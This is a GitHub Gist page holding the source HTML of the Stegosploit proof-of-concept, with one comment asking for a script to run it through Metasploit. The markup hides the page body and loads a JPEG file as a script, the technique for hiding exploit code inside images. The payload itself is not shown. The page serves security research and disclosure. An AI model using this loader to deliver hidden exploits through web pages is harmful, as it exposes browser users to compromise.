Last active
August 29, 2015 14:22
-
-
Save christianbundy/baf9e9a215d6338beb84 to your computer and use it in GitHub Desktop.
Source HTML for Stegosploit proof-of-concept by Saumil Shah.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<meta http-equiv="X-UA-Compatible" content="IE-Edge"> | |
<style> | |
body { visibility: hidden; } | |
img { visibility: visible; } | |
</style> | |
<script src="elephant3.jpg"></script> | |
</head> | |
<body> | |
<form id="testfm"> | |
<textarea id="child" value="a1" ></textarea> | |
<input id="child2" type="checkbox"name="option2" value="a2">Test check<Br> | |
<textarea id="child3" value="a2" ></textarea> | |
<input type="text" name="test1"> | |
</form> | |
<br> | |
<img src="#"> | |
<img src="elephant3.jpg"> | |
<img src="elephant2.jpg" id="pngdata" onload="setOnMouseOver()"> | |
<div id="target"></div> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
is there any python script or ruby to run stegosploit with metasploit framework